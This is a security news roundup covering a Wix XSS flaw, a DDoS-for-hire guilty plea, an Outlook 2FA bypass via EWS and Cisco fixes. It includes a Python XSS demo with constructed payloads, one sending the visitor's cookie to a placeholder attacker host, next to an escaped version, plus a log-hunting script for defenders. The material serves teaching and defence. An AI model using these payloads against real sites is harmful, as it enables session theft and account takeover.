This Week In Security #6
Security is looking past what you know. With new threats and vulnerabilities found every day, we'll try to give you an organized weekly dose of security news. This is Koda Ops TWIS #6.
XSS vulnerability puts many Wix.com users at risk
A recently discovered cross-site scripting (XSS) vulnerability is putting millions of websites and their users at risk. Wix, a hosting provider that offers free drag-and-drop website building tools, hosts millions of sites for around 87 million registered users, and all of those sites are reported to be affected. The bug lets an attacker run their own script in the browser of anyone who opens a crafted link to a Wix-hosted site. That script can push malware at visitors (the report mentions rootkits and ransomware), and because every Wix site shares the same vulnerable code, a payload that re-posts itself can spread through the user base like a worm. Worse, the script runs with the site's own origin, so if the visitor is the site owner it can act as them and hand full control of the website to the attacker. Exploitation is easy: it takes nothing more than adding a single parameter to the URL of any site built on Wix.com.
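To make the "one parameter" attack concrete, here is an added example (not Wix code, and not the specific Wix bug) showing the generic pattern: a search page that reflects a URL parameter into its HTML, first as written vulnerably and then hardened with context-appropriate escaping. The site name, the `q` parameter, the attacker host and the payloads are all constructed for illustration.

```python
"""Reflected XSS through a single URL parameter: vulnerable vs. hardened rendering.

Added example, not from the page or from Wix. The site, the "q" parameter,
the attacker host and the payloads below are constructed for illustration.
"""
from html import escape
from urllib.parse import parse_qs, quote, urlparse

SITE = "https://victim-site.invalid/search"  # constructed

# Constructed payload 1: HTML-body context, exfiltrates the visitor's cookie.
PAYLOAD = ('<script>new Image().src="https://attacker.invalid/c?"'
           '+encodeURIComponent(document.cookie)</script>')

# Constructed payload 2: attribute context, breaks out of value="..." without any '<'.
ATTR_PAYLOAD = '" onfocus="alert(document.domain)" autofocus x="'


def attack_url(payload):
    """Build the crafted link a victim would be sent: the site plus one parameter."""
    return f"{SITE}?q={quote(payload, safe='')}"


def _param(url, name):
    """First value of query parameter `name` (percent-decoded), or '' if absent."""
    return parse_qs(urlparse(url).query).get(name, [""])[0]


def render_unsafe(url):
    """Vulnerable: echoes the parameter straight into the page body and an attribute."""
    q = _param(url, "q")
    return (f"<p>Results for: {q}</p>\n"
            f'<input name="q" value="{q}">')


def render_safe(url):
    """Hardened: HTML-escape the value for both contexts it lands in.

    escape(..., quote=True) turns < > & " ' into entities, so the value can
    neither start a tag in the body nor terminate the value="..." attribute.
    """
    q = escape(_param(url, "q"), quote=True)
    return (f"<p>Results for: {q}</p>\n"
            f'<input name="q" value="{q}">')


if __name__ == "__main__":
    for payload in (PAYLOAD, ATTR_PAYLOAD):
        url = attack_url(payload)
        print("URL:   ", url)
        print("unsafe:", render_unsafe(url))
        print("safe:  ", render_safe(url))
        print()
```

The second payload is the one people forget: it contains no `<` at all, so a filter that only strips tags still lets it break out of the attribute. Escaping per output context is the fix, and it is only enough for HTML body and quoted-attribute sinks; values placed into JavaScript or URL contexts need their own encoders, client-side code should prefer `textContent` over `innerHTML`, and a Content Security Policy limits the damage when a sink is missed.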
DDoS tool creator pleads guilty
A 19-year-old from the UK has pleaded guilty to creating and running Titanium Stresser, an attack-for-hire or "booter" service that could be used to knock websites offline. According to a statement by Hertfordshire Police, Adam Mudd developed the tool when he was 15 and at first used it for his own attacks, 594 DDoS attacks in all, before selling it as a service to others. Investigators are still working out the total Mudd made from the service, but their estimate is around $385,000, and they determined that the tool contributed to at least 1.7 million attacks worldwide.
Outlook's two-factor authentication can be bypassed
It seems that enterprises running Exchange Server have been operating under a false sense of security regarding two-factor authentication (2FA) on Outlook Web Access (OWA). A weakness in how 2FA is typically bolted onto OWA lets an attacker who already has a user's password skip the second factor and reach the mailbox, calendar, contacts and more. The problem is that Exchange Server also exposes the Exchange Web Services (EWS) interface, and the 2FA products that guard the OWA login page do not cover it. EWS is enabled by default and is served on the same HTTPS port as OWA, so an attacker with stolen credentials can authenticate to EWS directly, password only, and read the user's inbox through that interface. The lesson for defenders: a second factor only helps if it sits in front of every authenticated endpoint, not just the web login page.
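One way to hunt for this bypass in your own logs, added here as an example (not from the page and not part of any Exchange or 2FA product): look for accounts with successful EWS requests from a source address that never completed an OWA login, since OWA is the only place the second factor is checked. The IIS log excerpt, the usernames and the corporate address ranges are constructed for the example.

```python
"""Hunt for EWS access that never passed the OWA (2FA-protected) login page.

Added example, not from the page or from any Exchange tooling. The log lines
are a constructed IIS W3C excerpt from an Exchange front end, trimmed to the
fields this check needs; the corporate ranges are constructed too.
"""
import ipaddress
from collections import defaultdict

# Constructed corporate address space; anything else is treated as external.
CORP_NETS = [ipaddress.ip_network("10.0.0.0/8"),
             ipaddress.ip_network("192.168.0.0/16")]

# Constructed IIS log excerpt. OWA and EWS share the same port, so both show up
# in the same log; only the URI tells them apart.
SAMPLE_LOG = """\
#Fields: date time cs-uri-stem cs-username c-ip sc-status
2016-10-24 09:01:12 /owa/auth.owa CORP\\alice 10.0.5.21 302
2016-10-24 09:01:13 /owa/ CORP\\alice 10.0.5.21 200
2016-10-24 09:02:44 /EWS/Exchange.asmx CORP\\alice 10.0.5.21 200
2016-10-24 11:17:03 /EWS/Exchange.asmx CORP\\bob 203.0.113.45 200
2016-10-24 11:17:05 /EWS/Exchange.asmx CORP\\bob 203.0.113.45 200
2016-10-24 11:20:00 /EWS/Exchange.asmx - 198.51.100.7 401
2016-10-24 12:05:30 /owa/ CORP\\carol 10.0.5.30 200
"""


def parse_iis_log(text):
    """Return one dict per data line; '#'-prefixed directive lines are skipped."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        date, time, uri, user, ip, status = line.split()
        records.append({"when": f"{date} {time}", "uri": uri, "user": user,
                        "ip": ip, "status": int(status)})
    return records


def is_internal(ip, nets=CORP_NETS):
    """True if the address falls inside one of the corporate ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def find_ews_without_owa(records, nets=CORP_NETS):
    """Return (user, ip) pairs with successful EWS requests but no OWA login.

    OWA's login page is where the 2FA add-on sits; EWS authenticates with just
    the password. A pair seen only on EWS therefore never touched the second
    factor. Anonymous ('-') and failed (>= 400) requests are ignored.
    """
    owa_sessions = set()
    ews_hits = defaultdict(int)
    for r in records:
        if r["user"] == "-" or r["status"] >= 400:
            continue
        uri = r["uri"].lower()
        if uri.startswith("/owa"):
            owa_sessions.add((r["user"], r["ip"]))
        elif uri.startswith("/ews/"):
            ews_hits[(r["user"], r["ip"])] += 1
    findings = []
    for (user, ip), hits in sorted(ews_hits.items()):
        if (user, ip) in owa_sessions:
            continue
        findings.append({"user": user, "ip": ip, "hits": hits,
                         "source": "internal" if is_internal(ip, nets) else "external"})
    return findings


if __name__ == "__main__":
    for finding in find_ews_without_owa(parse_iis_log(SAMPLE_LOG)):
        print(finding)
```

Treat the output as a hunting lead rather than an alert: Outlook desktop and mobile clients use EWS legitimately and never touch OWA, so an external source address or a user who has no such client is what makes a hit interesting. The real fix is to enforce the second factor at a layer that fronts every endpoint (for example a pre-authenticating reverse proxy), and to turn EWS off for mailboxes that do not need it with Exchange's `Set-CASMailbox -Identity <user> -EwsEnabled $false`.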
Cisco patches critical router and Prime Home bugs, then discloses a careers-site leak
This week didn't find Cisco at its best: while it was fixing one huge problem, another sprang up. Cisco has just patched critical bugs in its ASR 900 series routers and in Cisco Prime Home, its cloud-based network management platform. The router flaw was in the Transaction Language 1 (TL1) code and allowed an unauthenticated, remote attacker to execute code on an affected system. Cisco has released software updates that fix it.
But Cisco isn't in the clear just yet: its Professional Careers mobile site had a potential data leak, which Cisco attributes to an incorrect security setting that had been in place from August 2015 into 2016. The setting has since been corrected, and affected users are being prompted to change their passwords.
This has been This Week in Security. I hope you enjoyed reading; please comment below and stay tuned for more TWIS.